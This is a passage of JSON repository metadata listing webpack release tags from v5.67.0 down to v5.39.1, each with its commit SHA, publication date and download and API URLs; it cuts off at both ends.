","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack